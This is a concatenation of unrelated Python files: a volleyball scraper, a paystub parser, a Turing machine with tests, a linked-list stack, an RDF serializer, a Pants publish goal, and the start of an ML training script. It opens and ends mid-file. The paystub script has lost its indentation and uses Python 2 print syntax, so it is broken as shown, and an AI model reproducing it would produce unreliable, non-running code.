        (with -1 for a zombie-timeout case) — the code does not do that;
        confirm which contract callers expect.
        """
        servant = DjangoFrameSolution()
        version, body = servant.receive(self.client)
        if body != '':
            # Parse the received payload.
            json_inst = servant.parse(body)
            return json_inst
|
import charts
import scrap
# Base URL of the volleyball web data portal scraped by `scrap`.
base_url = 'http://cva-web.dataproject.com'
if __name__ == '__main__':
    # Scrape the data (both scrape calls are currently commented out, so
    # only the visualization step actually runs).
    print('开始爬取2018年,女排比赛数据...')
    # scrap.data_scrap(base_url + '/CompetitionHome.aspx?ID=4',2018)
    print('开始爬取2019年,女排比赛数据...')
    # scrap.data_scrap(base_url + '/CompetitionHome.aspx?ID=37',2019)
    # Analyze and visualize the (previously scraped) data.
    print('开始执行数据数据可视化...')
    charts.data_analysis()
# 'http://cva-web.dataproject.com/CompetitionHome.aspx?ID=4'
import csv, glob, os, time, datetime
from bs4 import BeautifulSoup
# Directory of html files
input_dir = "src/html_hourly/"
generated = time.strftime("%I:%M:%S, %d/%m/%Y")
timestamp = datetime.datetime.now()
# Create the CSV and header row
f = csv.writer(open("src/paycheck_hourly_%s.csv" % timestamp, "w"))
f.writerow(["Date", "Total Pay", "Net Pay", "Total Taxes", "Federal Taxes", "Social Security", "Medicare", "State Tax", "City Tax", "Deductions", "Hours", "Rate", "Generated"])
# Write to CSV
for file_name in glob.glob(input_dir+ "*.html"):
# Open the HTML files
with open(file_name) as fp:
record = BeautifulSoup(fp, "html.parser")
# Get paystub dates
date = record.find(id="paystub_form_tbl").td.get_text(strip=True).strip("Pay stub for period:").lstrip()
# Get the relevant sections
summary_table = record.find(id="paystub_summary_tbl").find_all('div')
pay_table = record.find(id="paystub_pay_tbl").find_all('div')
net_table = record.find(id="paystub_net_tbl").find_all('td')
tax_table = record.find(id="paystub_ee_taxes_tbl").find_all('td')
# Create lists
summaries = []
pay_rows = []
net_rows = []
tax_rows = []
# Clean data
for item in summary_table:
item = item.get_text("", strip=True).encode('utf-8')
summaries.append(item)
for item in pay_table:
item = item.get_text(",", strip=True).encode('utf-8')
pay_rows.append(item)
for item in net_table:
item = item.get_text(",", strip=True).encode('utf-8')
net_rows.append(item)
for item in tax_table:
item = item.get_text(",", strip=True).encode('utf-8')
tax_rows.append(item)
# Create items from cleaned arrays
total = summaries[0]
deductions = summaries[2]
taxes = summaries[4]
hours = pay_rows[4]
rate = pay_rows[5]
net = net_rows[1]
taxes_total = summaries[4]
federal_taxes = tax_rows[1]
social_security = tax_rows[4]
medicare = tax_rows[7]
state_tax = tax_rows[10]
city_tax = tax_rows[13]
f.writerow([date, total, net, taxes_total, federal_taxes, social_security, medicare, state_tax, city_tax, deductions, hours, rate, generated])
print date, total, net, taxes_total, federal_taxes, social_security, medicare, state_tax, city_tax, deductions, hours, rate, generated
|
#Pythagorean Sequence in Python
# Copyright © 2019, Sai K Raja, All Rights Reserved
def Pythagorean_Theorem(a, b):
    """Return the squared hypotenuse, c**2 = a**2 + b**2, for legs a and b.

    Negative legs are rejected (a message is printed and None returned).
    Fix: the original required a > 0 AND b > 0, so a zero-length leg fell
    through both branches and silently returned None; zero is now a valid
    leg length.
    """
    if a < 0 or b < 0:
        print("Cannot use negative values in Pythagorean Theorem")
        return None
    return a**2 + b**2
# Demo: print c**2 for legs 3 and 6 (the original wrapped this single
# call in a one-iteration loop).
print(Pythagorean_Theorem(3, 6))
|
"""
Name: Rafael Lopes Broseghini
Purpose: Create Turing machine that reverses a string of only 'r','e','v',s' characters.
"""
import unittest
class TuringMachine:
    """A single-tape Turing machine.

    ``delta`` maps (state, symbol) -> (next_state, symbol_to_write, move),
    where move is "R", "L", or anything else for "stay in place".
    """

    def __init__(self, startState=0, delta=None, finalStates=None):
        # Fix: the original used mutable default arguments ({} and set()),
        # so every machine built without explicit arguments shared one
        # transition table and one final-state set. Use None sentinels.
        self.startState = startState
        self.delta = {} if delta is None else delta
        self.finalStates = set() if finalStates is None else finalStates

    def run_machine(self, inputString: str) -> str:
        """Run the machine on ``inputString``.

        Returns the final tape rendered as "|c|c|...|" when a final state
        is reached; returns None (implicitly) if the machine halts because
        no transition exists for the current (state, symbol) key.
        """
        tape = Tape(inputString)
        theState = self.startState
        startRead = tape.read()
        key = (theState, startRead)
        reached_final = False
        transition_num = 0
        while key in self.delta and not reached_final:
            # Keeping track of how many transitions.
            transition_num += 1
            # Where to go, what to write, and which way to move the head.
            goTo, writeToTape, moveDirection = self.delta[key]
            tape.write(writeToTape)
            if moveDirection == "R":
                tape.move_right()
            elif moveDirection == "L":
                tape.move_left()
            else:
                tape.not_move()
            # Re-key on the new state and the symbol now under the head.
            key = (goTo, tape.read())
            if goTo in self.finalStates:
                # Render the tape directly rather than via Tape.__str__ so
                # the Tape object itself is not mutated further.
                contents = "".join(tape.contents).strip()
                return "|{}|".format("|".join(list(contents)))
class Tape:
    """Unbounded tape backed by a Python list, with 50 blank cells of
    padding on each side of the initial input."""
    def __init__(self, inputRead=""):
        self.contents = (
            [" " for item in range(50)] + list(inputRead) + [" " for item in range(50)]
        )
        # Head starts on the first character of the input.
        self.tapeReadPos = 50
    def read(self) -> str:
        """Return the symbol under the head."""
        return self.contents[self.tapeReadPos]
    def write(self, ch: str) -> None:
        """Overwrite the symbol under the head with ``ch``."""
        self.contents[self.tapeReadPos] = ch
    def move_right(self) -> None:
        """Move the head right, doubling the tape with trailing blanks if
        it runs off the end."""
        self.tapeReadPos += 1
        if self.tapeReadPos == len(self.contents):
            for item in range(len(self.contents)):
                self.contents.append(" ")
    def move_left(self) -> None:
        """Move the head left, prepending a tape-length run of blanks if
        it runs off the start (the head then points at the cell just
        before the old leftmost cell)."""
        self.tapeReadPos -= 1
        if self.tapeReadPos == -1:
            self.contents = [" " for item in range(len(self.contents))] + self.contents
            self.tapeReadPos = len(self.contents) // 2 - 1
    # Not move. Only accessed when reaches a final state.
    def not_move(self) -> None:
        """Leave the head where it is."""
        self.tapeReadPos = self.tapeReadPos
    def __str__(self) -> str:
        """Render the non-blank span of the tape as "|c|c|...|"."""
        tape = "".join(self.contents).strip()
        return "|{}|".format("|".join(list(tape)))
class TestTuringMachine(unittest.TestCase):
    """End-to-end test: the machine reverses '$reverse$' in place."""
    def test(self):
        # Transition table: (state, read) -> (next_state, write, move).
        # State 1 scans right for the next unprocessed letter, marks it
        # 'x', and dispatches to a letter-specific carry state (2/3/4/5),
        # which walks left to the blank area and writes the letter (via
        # 6/7/8/9 which return to the '$'-delimited region). States 10-12
        # clean up the 'x' markers and terminate.
        delta = {
            (0, "$"): (1, "$", "R"),
            (1, "x"): (1, "x", "R"),
            (1, "r"): (2, "x", "L"),
            (1, "e"): (5, "x", "L"),
            (1, "v"): (4, "x", "L"),
            (1, "s"): (3, "x", "L"),
            (1, "$"): (10, " ", "L"),
            (2, "$"): (2, "$", "L"),
            (2, "x"): (2, "x", "L"),
            (2, "r"): (2, "r", "L"),
            (2, "e"): (2, "e", "L"),
            (2, "v"): (2, "v", "L"),
            (2, "s"): (2, "s", "L"),
            # NOTE(review): duplicate key — (2, "e") already appears five
            # lines up with the identical value, so this entry is a no-op.
            (2, "e"): (2, "e", "L"),
            (2, " "): (6, "r", "R"),
            (3, "$"): (3, "$", "L"),
            (3, "r"): (3, "r", "L"),
            (3, "e"): (3, "e", "L"),
            (3, "v"): (3, "v", "L"),
            (3, "s"): (3, "s", "L"),
            (3, "x"): (3, "x", "L"),
            (3, " "): (7, "s", "R"),
            (4, "$"): (4, "$", "L"),
            (4, "r"): (4, "r", "L"),
            (4, "e"): (4, "e", "L"),
            (4, "v"): (4, "v", "L"),
            (4, "s"): (4, "s", "L"),
            (4, "x"): (4, "x", "L"),
            (4, " "): (8, "v", "R"),
            (5, "$"): (5, "$", "L"),
            (5, "r"): (5, "r", "L"),
            (5, "e"): (5, "e", "L"),
            (5, "v"): (5, "v", "L"),
            (5, "s"): (5, "s", "L"),
            (5, "x"): (5, "x", "L"),
            (5, " "): (9, "e", "R"),
            (6, "r"): (6, "r", "R"),
            (6, "e"): (6, "e", "R"),
            (6, "s"): (6, "s", "R"),
            (6, "v"): (6, "v", "R"),
            (6, "$"): (1, "$", "R"),
            (7, "r"): (7, "r", "R"),
            (7, "e"): (7, "e", "R"),
            (7, "s"): (7, "s", "R"),
            (7, "v"): (7, "v", "R"),
            (7, "$"): (1, "$", "R"),
            (8, "r"): (8, "r", "R"),
            (8, "e"): (8, "e", "R"),
            # NOTE(review): (8, "s") jumps to state 7 while every sibling
            # entry stays in its own state — looks like a typo for
            # (8, "s", ...) -> state 8, but the test passes either way
            # since states 7 and 8 behave identically from here; confirm.
            (8, "s"): (7, "s", "R"),
            (8, "v"): (8, "v", "R"),
            (8, "$"): (1, "$", "R"),
            (9, "r"): (9, "r", "R"),
            (9, "e"): (9, "e", "R"),
            (9, "s"): (9, "s", "R"),
            (9, "v"): (9, "v", "R"),
            (9, "$"): (1, "$", "R"),
            (10, "$"): (11, "$", "L"),
            (10, "x"): (10, " ", "L"),
            (11, "r"): (11, "r", "L"),
            (11, "e"): (11, "e", "L"),
            (11, "s"): (11, "s", "L"),
            (11, "v"): (11, "v", "L"),
            (11, " "): (12, "$", "N"),
        }
        # Set final state.
        finalStates = set([12])
        tm = TuringMachine(0, delta, finalStates)
        tape = Tape()
        self.assertEqual(tm.run_machine("$reverse$"), "|$|e|s|r|e|v|e|r|$|")
# Run the test suite when executed as a script.
if __name__ == "__main__":
    unittest.main()
    # main()
|
# Stack implementation using a linked list
class Node:
    """A single element of the stack's singly-linked list."""

    def __init__(self, data=None):
        # Payload and (initially absent) successor link.
        self.data = data
        self.next = None
class Stack:
    """LIFO stack backed by a singly-linked list; ``top`` is the head node."""

    def __init__(self):
        self.top = None
        self.bottom = None
        self.length = 0

    def peek(self):
        """Return the top node (None when empty) without removing it."""
        return self.top

    def push(self, value):
        """Wrap *value* in a Node, place it on top, and return the stack."""
        node = Node(value)
        if self.length:
            node.next = self.top
        else:
            # First element is simultaneously top and bottom.
            self.bottom = node
        self.top = node
        self.length += 1
        return self

    def pop(self):
        """Remove the top node (no-op when empty) and return the stack."""
        if not self.length:
            return self
        if self.top is self.bottom:
            self.bottom = None
        # CPython's reference counting reclaims the detached node.
        self.top = self.top.next
        self.length -= 1
        return self
#Testing
# Ad-hoc smoke test: push four values, then alternately inspect the top
# and pop. Expected output: Hello3, Hello2, Hello1, Hello.
myStack = Stack()
myStack.push('Hello')
myStack.push('Hello1')
myStack.push('Hello2')
myStack.push('Hello3')
print(myStack.peek().data)
myStack.pop()
print(myStack.peek().data)
myStack.pop()
print(myStack.peek().data)
myStack.pop()
print(myStack.peek().data)
|
import re
from pathlib import Path
from openpecha.serializers.rdf_setup import *
from openpecha.buda.op_fs import OpenpechaFS
from openpecha.buda.op_bare import OpenpechaBare
from openpecha.buda.tibetan_easy_chunker import TibetanEasyChunker
class Rdf:
    """
    TODO:
    - rename in RDFSerializer
    - initialize with an OpenPecha instead of a path
    """
    # Serializes one OpenPecha etext instance (local name `lname`) into a
    # BUDA RDF graph. Names such as rdflib, bdg, bdr, bdo, bda, adm, nsm,
    # rdf, rdfs, Literal and XSD come from the star import of
    # openpecha.serializers.rdf_setup.
    def __init__(self, lname, path=str(Path.home()/'.openpecha/data'), from_git=True):
        self.graphname = lname
        self.lod_ds = rdflib.Dataset()
        # Named graph bdg:<lname> holding all triples for this instance.
        self.lod_g = self.lod_ds.graph(bdg[self.graphname])
        self.lod_g.namespace_manager = nsm
        self.openpecha = self.create_openpecha(lname, path, from_git)
        self.setup_openpecha()
    def graph(self):
        """Return the rdflib graph being built."""
        return self.lod_g
    def add_triplet(self, rdf_subject, rdf_predicate, rdf_object):
        """Add one (s, p, o) triple to the graph."""
        self.lod_g.add((rdf_subject, rdf_predicate, rdf_object))
    @staticmethod
    def create_openpecha(lname, path, git):
        # Bare-git-repo backend vs. plain-filesystem backend.
        if git:
            return OpenpechaBare(lname, path)
        else:
            return OpenpechaFS(lname, path)
    """
    Setting up the openpecha, getting all the base_layers and extra layers
    """
    def setup_openpecha(self):
        self.get_op_base_layers()
        self.get_op_layers()
        self.get_op_meta()
    def get_op_base_layers(self):
        self.openpecha.get_base()
    def get_op_layers(self):
        self.openpecha.get_layers()
    def get_op_meta(self):
        self.openpecha.get_meta()
    """
    Building the RDF graph
    """
    def set_instance(self):
        """Entry point: emit the EtextInstance node and everything under it."""
        self.add_triplet(bdr[f'IE0{self.graphname}'], rdf.type, bdo["EtextInstance"])
        if self.openpecha.meta.get('source_metadata'):
            self.parse_meta()
        self.get_base_volumes()
        self.set_adm()
    def parse_meta(self):
        # source_metadata id is "<namespace>:<local>", e.g. resolved via the
        # module-level namespace objects through globals().
        sour = self.openpecha.meta['source_metadata']['id'].split(":")
        self.add_triplet(bdr[f'IE0{self.graphname}'], bdo['instanceReproductionOf'], globals()[sour[0]][sour[-1]])
    def get_base_volumes(self):
        """Emit volume asset, etext ref, and etext nodes for every base file."""
        for volume in self.openpecha.base_layer.items():
            self.set_etext_asset(volume)
            self.add_triplet(bdr[f'IE0{self.graphname}'], bdo['instanceHasVolume'],
                             bdr[f'VLIE0{self.graphname}_{volume[0].replace(".txt", "")}'])
            self.set_etext_ref(volume)
            self.set_etext(volume)
    def set_etext_asset(self, volume):
        # `volume` is a (filename, text) pair from base_layer.items().
        volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
        # Volume number = first run of digits in the filename.
        volume_number = int(re.search(r'\d+', volume[0].replace(".txt", "")).group())
        subject = bdr[f'VL{volume_name}']
        self.add_triplet(subject, rdf.type, bdo['VolumeEtextAsset'])
        self.add_triplet(subject, bdo['volumeHasEtext'], bdr[f'ER{volume_name}'])
        self.add_triplet(subject, bdo['volumeNumber'], Literal(volume_number, datatype=XSD.integer))
        self.add_triplet(subject, bdo['volumeOf'], bdr[f'IE0{self.graphname}'])
    def set_etext_ref(self, volume):
        volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
        subject = bdr[f'ER{volume_name}']
        self.add_triplet(subject, rdf.type, bdo['EtextRef'])
        self.add_triplet(subject, bdo['eTextResource'], bdr[f'UT{volume_name}'])
        self.add_triplet(subject, bdo['seqNum'], Literal(1, datatype=XSD.integer))
    def set_etext(self, volume):
        volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
        volume_number = int(re.search(r'\d+', volume[0].replace(".txt", "")).group())
        subject = bdr[f'UT{volume_name}']
        self.add_triplet(subject, rdf.type, bdo['Etext'])
        self.add_triplet(subject, bdo['eTextInInstance'], bdr[volume_name])
        self.add_triplet(subject, bdo['eTextIsVolume'], Literal(volume_number, datatype=XSD.integer))
        self.add_triplet(subject, rdfs.seeAlso, Literal(f'https://github.com/OpenPecha/{self.graphname}/', datatype=XSD.anyURI))
        self.set_etext_pages(volume)
        self.set_etext_chunks(volume)
    def set_etext_pages(self, volume):
        volume_number = volume[0].replace(".txt", "")
        # Pagination annotations come from the per-volume layer files.
        annotations = self.openpecha.layers[volume_number]['pagination.yml'].annotations
        for annotation in annotations:
            self.set_etext_page(annotation, volume)
    def set_etext_page(self, annotation, volume):
        volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
        subject = bdr[f'EP{annotation["id"]}']
        sequence = self.get_sequence(annotation['page_index'])
        start = annotation['span']['start']
        end = annotation['span']['end']
        self.add_triplet(subject, rdf.type, bdo['EtextPage'])
        self.add_triplet(subject, bdo['seqNum'], Literal(sequence, datatype=XSD.integer))
        self.add_triplet(subject, bdo['sliceEndChar'], Literal(end, datatype=XSD.integer))
        self.add_triplet(subject, bdo['sliceStartChar'], Literal(start, datatype=XSD.integer))
        self.add_triplet(bdr[f'UT{volume_name}'], bdo['eTextHasPage'], subject)
    @staticmethod
    def get_sequence(page_index):
        # Page index like "12a"/"12b" -> global page sequence: side 'a' is
        # odd (2n-1), side 'b' is even (2n).
        number = int(re.search(r'\d+', page_index).group())
        return number * 2 if page_index[-1] == 'b' else (number * 2) - 1
    def set_etext_chunks(self, volume):
        volume_string = self.openpecha.base_layer[volume[0]]
        chunk_indexes = self.get_chunk_index(volume_string)
        # NOTE(review): stopping at len-2 pairs indexes [i], [i+1] up to
        # [len-2] only, so the final boundary pair is never emitted —
        # possible off-by-one; confirm against what
        # TibetanEasyChunker.get_chunks returns.
        for i in range(0, len(chunk_indexes) - 2):
            self.set_etext_chunk(i, chunk_indexes[i], chunk_indexes[i + 1], volume)
    def set_etext_chunk(self, i, start_char, end_char, volume):
        volume_name = f'IE0{self.graphname}_{volume[0].replace(".txt", "")}'
        volume_string = self.openpecha.base_layer[volume[0]]
        etext = f'UT{volume_name}'
        # Chunk id is zero-padded to five digits for stable ordering.
        subject = bdr[f'UT{volume_name}_{int(i):05}']
        self.add_triplet(subject, rdf.type, bdo['EtextChunk'])
        self.add_triplet(subject, bdo['chunkContents'], Literal(volume_string[start_char:end_char], lang="bo"))
        self.add_triplet(subject, bdo['sliceEndChar'], Literal(end_char, datatype=XSD.integer))
        self.add_triplet(subject, bdo['sliceStartChar'], Literal(start_char, datatype=XSD.integer))
        self.add_triplet(bdr[etext], bdo['eTextHasChunk'], subject)
    def set_adm(self):
        """Emit the AdminData node (license, status, last git commit)."""
        subject = bda[f'IE0{self.graphname}']
        commit = self.openpecha.get_last_commit()
        self.add_triplet(subject, rdf.type, adm['AdminData'])
        self.add_triplet(subject, adm['adminAbout'], subject)
        self.add_triplet(subject, adm['metadataLegal'], bda['LD_BDRC_CC0'])
        self.add_triplet(subject, adm['openPechaCommit'], Literal(commit))
        self.add_triplet(subject, adm['status'], bda['StatusReleased'])
    @staticmethod
    def get_chunk_index(string):
        # Chunk boundaries every ~1500 characters, Tibetan-aware.
        chunker = TibetanEasyChunker(string, 1500)
        indexes = chunker.get_chunks()
        return indexes
    """
    Getting details of the rdf
    """
    def print_rdf(self):
        # NOTE(review): rdflib >= 6 returns str from serialize(), on which
        # .decode would raise AttributeError — assumes rdflib 5.x; confirm.
        print(self.lod_g.serialize(format='ttl').decode("utf-8"))
    def rdf(self):
        return self.lod_g
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""Goal for publishing packaged targets to any repository or registry etc.
Plugins implement the publish protocol that provides this goal with the processes to run in order to
publish the artifacts.
The publish protocol consists of defining two union members and one rule, returning the processes to
run. See the doc for the corresponding classes in this module for details on the classes to define.
Example rule:
@rule
async def publish_example(request: PublishToMyRepoRequest, ...) -> PublishProcesses:
# Create `InteractiveProcess` instances as required by the `request`.
return PublishProcesses(...)
"""
from __future__ import annotations
import collections
import json
import logging
from abc import ABCMeta
from dataclasses import asdict, dataclass, field, is_dataclass, replace
from itertools import chain
from typing import ClassVar, Generic, Type, TypeVar
from typing_extensions import final
from pants.core.goals.package import BuiltPackage, EnvironmentAwarePackageRequest, PackageFieldSet
from pants.engine.addresses import Address
from pants.engine.collection import Collection
from pants.engine.console import Console
from pants.engine.environment import ChosenLocalEnvironmentName, EnvironmentName
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.process import InteractiveProcess, InteractiveProcessResult
from pants.engine.rules import Effect, Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.target import (
FieldSet,
ImmutableValue,
NoApplicableTargetsBehavior,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
)
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.option.option_types import StrOption
from pants.util.frozendict import FrozenDict
logger = logging.getLogger(__name__)
_F = TypeVar("_F", bound=FieldSet)
class PublishOutputData(FrozenDict[str, ImmutableValue]):
    # Immutable mapping of structured publish-outcome data (target, names,
    # status, exit code, ...); collected by `run_publish` and dumped as
    # JSON when `--output` is set.
    pass
@union(in_scope_types=[EnvironmentName])
@dataclass(frozen=True)
class PublishRequest(Generic[_F]):
    """Implement a union member subclass of this union class along with a PublishFieldSet subclass
    that appoints that member subclass in order to receive publish requests for targets compatible
    with the field set.

    The `packages` hold all artifacts produced for a given target to be published.

    Example:

        PublishToMyRepoRequest(PublishRequest):
            pass

        PublishToMyRepoFieldSet(PublishFieldSet):
            publish_request_type = PublishToMyRepoRequest

            # Standard FieldSet semantics from here on:
            required_fields = (MyRepositories,)
            ...
    """

    # The target's publish-related fields (a PublishFieldSet subclass instance).
    field_set: _F
    # All packages built for the target, to be published together.
    packages: tuple[BuiltPackage, ...]
_T = TypeVar("_T", bound=PublishRequest)
@union(in_scope_types=[EnvironmentName])
@dataclass(frozen=True)
class PublishFieldSet(Generic[_T], FieldSet, metaclass=ABCMeta):
    """FieldSet for PublishRequest.

    Union members may list any fields required to fulfill the instantiation of the
    `PublishProcesses` result of the publish rule.
    """

    # Subclasses must provide this, to a union member (subclass) of `PublishRequest`.
    publish_request_type: ClassVar[Type[_T]]  # type: ignore[misc]

    @final
    def _request(self, packages: tuple[BuiltPackage, ...]) -> _T:
        """Internal helper for the core publish goal."""
        return self.publish_request_type(field_set=self, packages=packages)

    @final
    @classmethod
    def rules(cls) -> tuple[UnionRule, ...]:
        """Helper method for registering the union members."""
        return (
            UnionRule(PublishFieldSet, cls),
            UnionRule(PublishRequest, cls.publish_request_type),
        )

    def get_output_data(self) -> PublishOutputData:
        # Minimal structured-output record: which target this field set
        # belongs to.
        return PublishOutputData({"target": self.address})
@dataclass(frozen=True)
class PublishPackages:
    """Processes to run in order to publish the named artifacts.

    The `names` should list all artifacts being published by the `process` command.

    The `process` may be `None`, indicating that it will not be published. This will be logged as
    `skipped`. If the process returns a non zero exit code, it will be logged as `failed`.

    The `description` may be a reason explaining why the publish was skipped, or identifying which
    repository the artifacts are published to.
    """

    names: tuple[str, ...]
    process: InteractiveProcess | None = None
    description: str | None = None
    # Extra structured output merged into this entry's JSON record.
    data: PublishOutputData = field(default_factory=PublishOutputData)

    def get_output_data(self, **extra_data) -> PublishOutputData:
        # Merge order: names first, then per-entry data, then caller extras
        # (later keys win in the resulting mapping).
        return PublishOutputData(
            {
                "names": self.names,
                **self.data,
                **extra_data,
            }
        )
class PublishProcesses(Collection[PublishPackages]):
    """Collection of what processes to run for all built packages.

    This is returned from implementing rules in response to a PublishRequest.

    Depending on the capabilities of the publishing tool, the work may be partitioned based on
    number of artifacts and/or repositories to publish to.
    """
@dataclass(frozen=True)
class PublishProcessesRequest:
    """Internal request taking all field sets for a target and turning it into a `PublishProcesses`
    collection (via registered publish plugins)."""

    # Field sets used to build the target's packages.
    package_field_sets: tuple[PackageFieldSet, ...]
    # Field sets used to publish those packages.
    publish_field_sets: tuple[PublishFieldSet, ...]
class PublishSubsystem(GoalSubsystem):
    name = "publish"
    help = "Publish deliverables (assets, distributions, images, etc)."

    @classmethod
    def activated(cls, union_membership: UnionMembership) -> bool:
        # The goal only makes sense when both packaging and publishing
        # plugins are registered.
        return PackageFieldSet in union_membership and PublishFieldSet in union_membership

    output = StrOption(
        default=None,
        help="Filename for JSON structured publish information.",
    )
class Publish(Goal):
    """The `publish` goal."""
    subsystem_cls = PublishSubsystem
    environment_behavior = Goal.EnvironmentBehavior.USES_ENVIRONMENTS
@goal_rule
async def run_publish(
    console: Console, publish: PublishSubsystem, local_environment: ChosenLocalEnvironmentName
) -> Publish:
    """Build all publishable targets, run their publish processes
    interactively, report per-artifact results, and optionally dump the
    structured results as JSON to `--output`."""
    target_roots_to_package_field_sets, target_roots_to_publish_field_sets = await MultiGet(
        Get(
            TargetRootsToFieldSets,
            TargetRootsToFieldSetsRequest(
                PackageFieldSet,
                goal_description="",
                # Don't warn/error here because it's already covered by `PublishFieldSet`.
                no_applicable_targets_behavior=NoApplicableTargetsBehavior.ignore,
            ),
        ),
        Get(
            TargetRootsToFieldSets,
            TargetRootsToFieldSetsRequest(
                PublishFieldSet,
                goal_description="the `publish` goal",
                no_applicable_targets_behavior=NoApplicableTargetsBehavior.warn,
            ),
        ),
    )

    # Only keep field sets that both package something, and have something to publish.
    targets = set(target_roots_to_package_field_sets.targets).intersection(
        set(target_roots_to_publish_field_sets.targets)
    )

    if not targets:
        return Publish(exit_code=0)

    # Build all packages and request the processes to run for each field set.
    processes = await MultiGet(
        Get(
            PublishProcesses,
            PublishProcessesRequest(
                target_roots_to_package_field_sets.mapping[tgt],
                target_roots_to_publish_field_sets.mapping[tgt],
            ),
        )
        for tgt in targets
    )

    # Run all processes interactively.
    exit_code: int = 0
    outputs: list[PublishOutputData] = []
    results: list[str] = []

    for pub in chain.from_iterable(processes):
        # A missing process means the plugin chose to skip this entry.
        if not pub.process:
            sigil = console.sigil_skipped()
            status = "skipped"
            if pub.description:
                status += f" {pub.description}"
            for name in pub.names:
                results.append(f"{sigil} {name} {status}.")
            outputs.append(pub.get_output_data(published=False, status=status))
            continue

        logger.debug(f"Execute {pub.process}")
        res = await Effect(
            InteractiveProcessResult,
            {pub.process: InteractiveProcess, local_environment.val: EnvironmentName},
        )
        if res.exit_code == 0:
            sigil = console.sigil_succeeded()
            status = "published"
            prep = "to"
        else:
            sigil = console.sigil_failed()
            status = "failed"
            prep = "for"
            # Any single failure makes the whole goal fail (last failing
            # code wins).
            exit_code = res.exit_code

        if pub.description:
            status += f" {prep} {pub.description}"

        for name in pub.names:
            results.append(f"{sigil} {name} {status}.")

        outputs.append(
            pub.get_output_data(
                exit_code=res.exit_code,
                published=res.exit_code == 0,
                status=status,
            )
        )

    console.print_stderr("")
    if not results:
        sigil = console.sigil_skipped()
        console.print_stderr(f"{sigil} Nothing published.")

    # We collect all results to the end, so all output from the interactive processes are done,
    # before printing the results.
    for line in results:
        console.print_stderr(line)

    # Log structured output
    output_data = json.dumps(outputs, cls=_PublishJsonEncoder, indent=2, sort_keys=True)
    logger.debug(f"Publish result data:\n{output_data}")
    if publish.output:
        with open(publish.output, mode="w") as fd:
            fd.write(output_data)

    return Publish(exit_code)
class _PublishJsonEncoder(json.JSONEncoder):
    """JSON encoder for publish output data that degrades gracefully:
    dataclasses, mappings and sequences are converted to plain containers,
    and anything else the base encoder rejects falls back to str()."""

    safe_to_str_types = (Address,)

    def default(self, o):
        """Return a serializable object for o."""
        if is_dataclass(o):
            converted = asdict(o)
        elif isinstance(o, collections.abc.Mapping):
            converted = dict(o)
        elif isinstance(o, collections.abc.Sequence):
            converted = list(o)
        else:
            try:
                converted = super().default(o)
            except TypeError:
                converted = str(o)
        return converted
@rule
async def package_for_publish(
    request: PublishProcessesRequest, local_environment: ChosenLocalEnvironmentName
) -> PublishProcesses:
    """Build the target's packages, fan them out to every registered
    publish plugin, and tag each resulting process with the originating
    field set's output data."""
    packages = await MultiGet(
        Get(BuiltPackage, EnvironmentAwarePackageRequest(field_set))
        for field_set in request.package_field_sets
    )

    for pkg in packages:
        for artifact in pkg.artifacts:
            if artifact.relpath:
                logger.info(f"Packaged {artifact.relpath}")
            elif artifact.extra_log_lines:
                logger.info(str(artifact.extra_log_lines[0]))

    publish = await MultiGet(
        Get(
            PublishProcesses,
            {
                field_set._request(packages): PublishRequest,
                local_environment.val: EnvironmentName,
            },
        )
        for field_set in request.publish_field_sets
    )

    # Flatten and dress each publish processes collection with data about its origin.
    publish_processes = [
        replace(
            publish_process,
            data=PublishOutputData({**publish_process.data, **field_set.get_output_data()}),
        )
        for processes, field_set in zip(publish, request.publish_field_sets)
        for publish_process in processes
    ]

    return PublishProcesses(publish_processes)
def rules():
    """Expose this module's @rule-decorated functions to the engine."""
    return collect_rules()
|
from model.semco import SemCo
import parser as parser
import pickle
from pathlib import Path
import torch
import os
# Per-channel normalization statistics: dataset name -> (mean RGB, std RGB).
# MNIST / Fashion-MNIST values are replicated across three channels
# (grayscale presumably expanded to RGB upstream -- TODO confirm).
STATS = {'imagenet':((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
         'mini_imagenet':((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
         'cifar100':((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)),
         'cifar10': ((0.4913, 0.4821, 0.4465), (0.247, 0.2434, 0.2615)),
         'domain_net-real': ((0.6059, 0.5890, 0.5558), (0.3195, 0.3128, 0.3352)),
         'mnist': ((0.1307, 0.1307, 0.1307), (0.3081, 0.3081, 0.3081)),
         'fashion_mnist': ((0.286, 0.286, 0.286), (0.353, 0.353, 0.353)),
         }
if __name__ == '__main__':
    # Entry point: load data splits, build a SemCo model and train it.
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    args = parser.parse_args()  # wrapper to argparse but using same names for argparse lib
    dataset_name = args.dataset_name
    # Fall back to the default split files only when BOTH pickle paths are
    # unspecified.
    # NOTE(review): because this is `and`, passing only one of the two flags
    # takes the else-branch and opens the other (None) path -- confirm
    # whether `or` was intended.
    if args.valid_split_pickle is None and args.classes_pickle is None:
        classes = pickle.load(Path(f'splits/{dataset_name}_classes.pkl').open('rb'))
        valid_data = pickle.load(Path(f'splits/{dataset_name}_valid_data.pkl').open('rb'))
        # Record the effective paths back on args for downstream logging/use.
        setattr(args, 'classes_pickle', f'splits/{dataset_name}_classes.pkl')
        setattr(args, 'valid_split_pickle', f'splits/{dataset_name}_valid_data.pkl')
    else:
        classes = pickle.load(Path(args.classes_pickle).open('rb'))
        valid_data = pickle.load(Path(args.valid_split_pickle).open('rb'))
    labelled_data = pickle.load(Path(args.train_split_pickle).open('rb'))
    # dataset_path = os.path.join(args.dataset_path, f"external/{dataset_name}/{dataset_name}_full/")
    dataset_path = os.path.join(args.dataset_path, dataset_name)
    dataset_meta = {'classes': classes}
    # Use dataset-specific normalization only when not using an
    # imagenet-pretrained resnet backbone; otherwise keep imagenet stats.
    if args.no_imgnet_pretrained or (args.model_backbone is not None and 'resnet' not in args.model_backbone):
        dataset_meta['stats'] = STATS[dataset_name]
        print(f'Using {dataset_name} stats for normalization')
    else:
